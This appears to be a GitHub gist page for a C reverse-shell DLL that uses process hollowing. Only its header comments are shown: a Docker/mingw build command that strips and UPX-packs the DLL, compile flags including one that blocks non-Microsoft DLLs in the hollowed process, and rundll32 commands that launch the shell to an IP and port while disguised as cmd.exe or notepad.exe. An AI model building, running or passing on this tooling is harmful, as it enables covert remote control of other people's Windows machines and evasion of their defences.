r00t-3xp10it
/ process-hollow-shell-dll.c
Created
July 25, 2021 04:06
— forked from FrankSpierings/process-hollow-shell-dll.c
Reverse shell which uses process hollowing technique
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
| // | |
| // Use -DDEBUG at compile time, for the logging printf messages. | |
| // Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
| // Use -DWAITFOR at compile time, to wait for the host process to finish. | |
| // | |
| // Run: | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |